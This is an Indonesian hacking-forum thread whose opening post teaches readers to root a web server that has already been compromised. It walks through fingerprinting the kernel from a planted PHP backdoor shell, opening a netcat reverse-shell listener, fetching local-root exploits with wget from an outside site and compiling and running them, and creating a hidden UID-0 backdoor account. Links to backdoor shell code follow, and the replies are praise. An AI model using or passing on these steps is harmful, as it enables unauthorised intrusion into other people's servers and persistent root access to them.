Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-22-2013, 10:56 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
« Previous 1 ... 9 10 11 12 13 ... 54 Next »

[Tutor] Root Server & Tambah User Root Baru

Home General Computer Multimedia Business Lounge

Pages (3): 1 2 3 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor Root Server & Tambah User Root Baru
03-02-2012, 09:59 AM
Post: #1
DnA19 Away
Devilz e-Magazine Team (DeMT)
*****
DeMT Team
Posts: 446
Joined: Sep 2011
Reputation: 74
Root Server & Tambah User Root Baru
assalamu'alaikum...

lagi jalan2 ama paman google ane nemu tutor nih,
jd ane bagi aja ama member DC...
tp ini buat yang belum tahu aja ya gan... pasrah
kalo repost maaf ya (delete aja) ... prustasi

langsung aja... hore
Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.
Hal yang dibutuhkan adalah:
  • Komputer & Kopi ngopi
  • Situs target yang sudah di inject “shell backdoor”
  • Tool-tool Localroot Exploit
  • Netcat



  1. Cari Informasi Detail Server Target

    Buka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “shell php”
    Contoh: http://www.situstargetyangtelahdihack.co.../shell.php

    Tampilannya akan seperti dibawah:
    [Image: Rxh6os7e4dge3uN-Region.png]
    Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “shell backdoor” seperti contoh di atas yaitu:

    Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

    Atau anda juga bisa menggunakan dan menjalankan perintah: uname -a

    Dari informasi diatas kita ketahui bahwa kernelnya adalah: 2.6.18-8 i686

    Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini: 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

    Kita cari disini saja localroot exploitnya, kebetulan banyak listnya: localroot.th3-0utl4ws
  2. BackConnecting Dari Server Ke Komputer Attacker

    Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:
    1. Netcat Tools (Harus sudah terinstall di komputer)
    2. Open port (Port-port yang secara otomatis terbuka)

    Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah 443:

    C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443

    Kemudian tekan “Enter”

    Nanti akan muncul pesan “Listening on [any] 443 …”

    Setelah itu, kita kembali ke “shell backkdor” yang sudah kita tanamkan.
    Cari fungsi “Back Connect“, kemudian isikan IP yang kita miliki & port.

    Misal: IP Kita: 10.10.10.10 dan port: 443, seperti gambar dibawah:
    [Image: 23cSqoxuW7FY3MO-Region.png]
    Kita jalankan perintah “Connect”

    Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.
    [Image: FuV6epg7POchdxV-CWINDOWSsystem32.png]
  3. Download Exploit & Eksekusi Exploit

    Kita akan membutuhkan localroot exploit, bisa di download dari link yang sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu:
    • Menggunakan fungsi “WGET / CURL”
    • Bisa menggunakan cara upload manual dari shell
    Berhubung di server ini “WGET” bisa dilakukan, maka download localroot exploit memakai fungsi “WGET”.
    Oke, copy saja download link “localroot exploit yang tepat:

    Download Kumpulan Tools Localroot Dari Th3-0utl4ws
    Untuk mendownload tools diatas ketikkan saja perintah:
    wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip

    Apabila sudah terdownload maka extract “local root tools” tersebut, bisa dengan menggunakan perintah “unzip” atau “untar” atau “tar”
    [Image: vjUt4DhVknKljlm-CWINDOWSsystem32.png]
    Seperti contoh diatas, “localroot exploit sudah terdownload” dan ter-extract:

    unzip prct1.c.zip

    Langkah selanjutnya adalah mengcompile localroot exploit tersebut, karena menggunakan bahasa “C”, maka yang digunakan adalah perintah GCC:

    gcc prct1.c -o prc

    Kemudian jalankan:

    ./prc

    Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools “local root” exploit yang lainnya. (JANGAN MENYERAH!)

    Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!

    Unzip lagi file localroot exploit yang lainnya: unzip 2.6.18-164.zip
    [Image: XgNQSgGHdRXyIN5-CWINDOWSsystem32.png]
    Nah, localroot exploit diatas sangat cocok untuk kernel ini: (“2.6.18-164“)

    Karena sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi, langsung saja dieksekusi & jangan lupa change permissionnya jadi “777″, seperti contoh berikut:

    chmod 777 2.6.18-164

    Kemudian jalankan exploit:

    ./2.6.18-164

    Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:

    id
    or
    whoami
    [Image: 1nOr845qTNAPEn3-CWINDOWSsystem32.png]
    Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!
  4. Menambahkan User Root Baru

    Menambahkan user akses selevel dengan root sangatlah mudah, gunakan saja perintah berikut, sebagai contoh kita akan menambahkan akses root dengan user “Haxorfortutorial“:

    adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Haxorfortutorial

    Penjelasan perintah:
    Quote:

    adduser – Perintah dasar linux untuk menambahkan user

    -u 0 -o – set user menjadi dengan ID nol (0) root.

    -g 0 – Set initial group dengan ID nol (0) root.

    -G 0,1,2,3,4,6,10 – Set additional group ke:
    0 = root
    1 = bin
    2 = daemon
    3 = sys
    4 = adm
    6 = disk
    10 = wheel

    -M – ‘home directory’ tidak di create ke user.

    Haxorfortutorial - User name of the new user account.

    Catatan: Rubah user Haxorfortutorial sesuai dengan username yang kalian inginkan, ini hanya contoh saja.

    Selanjutnya, lakukan set password untuk user yang telah kita buat.

    Perintahnya:
    passwd Haxorfortutorial

    Contoh implementasi:

    [root@fedora ~]# passwd Haxorfortutorial
    Changing password for user Haxorfortutorial.
    New UNIX password:
    Retype new UNIX password:
    passwd: all authentication tokens updated successfully.

    id Haxorfortutorial

    [Image: LEoszc56WjqoepL-CWINDOWSsystem32.png]
    Backdoor GNY shell – http://privatepaste.com/1321f97984
    Tools NetCat – http://downloadnetcat.com/nc11nt.zip


sekian dulu ya...
semoga bermanfaat...

wassalamu'alaikum...

Quote:binushacker
Find all posts by this user
Quote this message in a reply
 Reputed by :  nanda(+1) , DC_Julianz(+1) , cangcimen(+1)
03-02-2012, 10:03 AM
Post: #2
supermenganteng Offline
SPA Holic
********
Jendral Team
Posts: 1,961
Joined: Jun 2010
Reputation: -188
RE: Root Server & Tambah User Root Baru
nice tutor om...dewa nte ne..thnxs for share
Find all posts by this user
Quote this message in a reply
03-02-2012, 10:18 AM
Post: #3
KotoM Online
Covergay Dewa
Posts: 559
Joined: May 2011
Reputation: 58
RE: Root Server & Tambah User Root Baru
metal
ada hekcer dewa tersipu
Find all posts by this user
Quote this message in a reply
03-02-2012, 10:21 AM
Post: #4
KillerByte Offline
./Devilz Commander
Posts: 337
Joined: Jan 2012
Reputation: 5
RE: Root Server & Tambah User Root Baru
nggak semua vuln + ada exploitnya ngakak itu yg bikin sulit relax
Visit this user's website Find all posts by this user
Quote this message in a reply
03-02-2012, 10:26 AM
Post: #5
nanda Away
Wahyu Adi Prasetyo
**
Moderators
Posts: 2,017
Joined: Aug 2011
Reputation: 119
RE: Root Server & Tambah User Root Baru
Nah itu yang w cari ..
mantap bget ..
Thx bro mantap
Find all posts by this user
Quote this message in a reply
03-02-2012, 10:30 AM
Post: #6
DnA19 Away
Devilz e-Magazine Team (DeMT)
*****
DeMT Team
Posts: 446
Joined: Sep 2011
Reputation: 74
RE: Root Server & Tambah User Root Baru
(03-02-2012 10:26 AM)DC_Nanda23 Wrote:  Nah itu yang w cari ..
mantap bget ..
Thx bro mantap

smangatsmangatsmangat
Find all posts by this user
Quote this message in a reply
03-02-2012, 10:38 AM
Post: #7
adoet_t Offline
Devilz e-Magazine Team (DeMT)
*****
DeMT Team
Posts: 128
Joined: Jul 2010
Reputation: 22
RE: Root Server & Tambah User Root Baru
mantep om,, w00t w00t,, tengkyu,,
nambahin punya om whitehat http://devilzc0de.org/forum/thread-1071.html
after rooted.
Visit this user's website Find all posts by this user
Quote this message in a reply
03-02-2012, 10:40 AM
Post: #8
DnA19 Away
Devilz e-Magazine Team (DeMT)
*****
DeMT Team
Posts: 446
Joined: Sep 2011
Reputation: 74
RE: Root Server & Tambah User Root Baru
(03-02-2012 10:38 AM)adoet_t Wrote:  mantep om,, w00t w00t,, tengkyu,,
nambahin punya om whitehat http://devilzc0de.org/forum/thread-1071.html
after rooted.

mantapmantapmantap
Find all posts by this user
Quote this message in a reply
03-02-2012, 12:45 PM
Post: #9
momodrock Offline
./Devilz Musician .\m/
Posts: 549
Joined: Oct 2011
Reputation: 26
RE: Root Server & Tambah User Root Baru
mantap smangat
ane lgi nyari yg ky ginian om hmm
thx 4 share
Visit this user's website Find all posts by this user
Quote this message in a reply
03-02-2012, 01:30 PM
Post: #10
jackerp Offline
./Devilz Advisor
Posts: 576
Joined: Jan 2011
Reputation: 41
RE: Root Server & Tambah User Root Baru
Sangat super kang ... !!
Gw suka yang gnian... !! mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (3): 1 2 3 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] Hunting Windows Server+Upload Shell Via phpmyadmin using Computer Search Engine tey 18 687 05-19-2013 02:28 PM
Last Post: GuestMac
Bug [Tutor] Jumping server kompas,10 up got rooted!! KotoM 70 1,544 05-18-2013 01:05 AM
Last Post: KotoM
Rainbow Windows Server Mass Deface facl3ss 6 242 05-13-2013 02:49 PM
Last Post: ibnoeabdulaziz
  SQL Injection "detail_prod" server luxembourg [dc]zombierss[dc] 30 469 03-17-2013 11:41 AM
Last Post: Rifaldi238
  ask root server web Backtracktux 17 284 02-15-2013 10:58 AM
Last Post: ciblex21
  [Solved] tempat dwnload list local root exploit angelcyber942 4 118 02-12-2013 09:13 PM
Last Post: angelcyber942
Big Grin [Ask] Server gak bisa di Symlink sama Config tebe4rt 14 327 12-02-2012 10:38 AM
Last Post: Regel
  [Ask] tutorial nge-root versi baru dan newbie panjidani 3 227 11-19-2012 04:37 PM
Last Post: zal_freaks
  Shutdown server hostingan oela 30 1,253 10-14-2012 05:00 PM
Last Post: momoattacker
  [ TUTOR ] what to do after getting root access (0wning ubuntu/debian) blackhat 20 879 09-22-2012 04:18 AM
Last Post: sempak123

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-22-2013, 10:56 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE